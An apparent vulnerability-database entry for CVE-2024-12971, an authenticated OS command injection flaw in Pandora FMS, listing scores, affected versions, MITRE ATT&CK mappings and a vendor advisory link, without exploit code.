CVE-2024-12971

High

Published: 17 March 2025

Published

17 March 2025

Modified

16 September 2025

KEV Added

—

Patch

—

CVSS Score 8.8 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

EPSS Score 0.8315 99.3th percentile

Risk Priority 67 60% EPSS · 20% KEV · 20% CVSS

Description

Adversaries may abuse Unix shell commands and scripts for execution.

Security Summary

CVE-2024-12971 is an Improper Neutralization of Special Elements used in a Command vulnerability (CWE-77) that enables OS Command Injection. It affects Pandora FMS versions from 700 to 777.6.

The vulnerability carries a CVSS v3.1 base score of 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). Low-privileged authenticated users can exploit it over the network with low attack complexity and no user interaction, potentially achieving high impacts on confidentiality, integrity, and availability through arbitrary OS command execution.

Mitigation details are available in the vendor advisory at https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/.

Details

CWE(s): CWE-77

Affected Products

artica

pandora fms

700 — 777.8

MITRE ATT&CK Enterprise Techniques

T1190 Exploit Public-Facing Application Initial Access

Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.

attack.mitre.org →

T1059.004 Unix Shell Execution

Adversaries may abuse Unix shell commands and scripts for execution.

attack.mitre.org →

Why these techniques?

OS command injection in a network-accessible application directly enables exploitation of public-facing apps (T1190) and arbitrary command execution via Unix shell (T1059.004).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

References

https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/
Vendor Advisory · security@pandorafms.com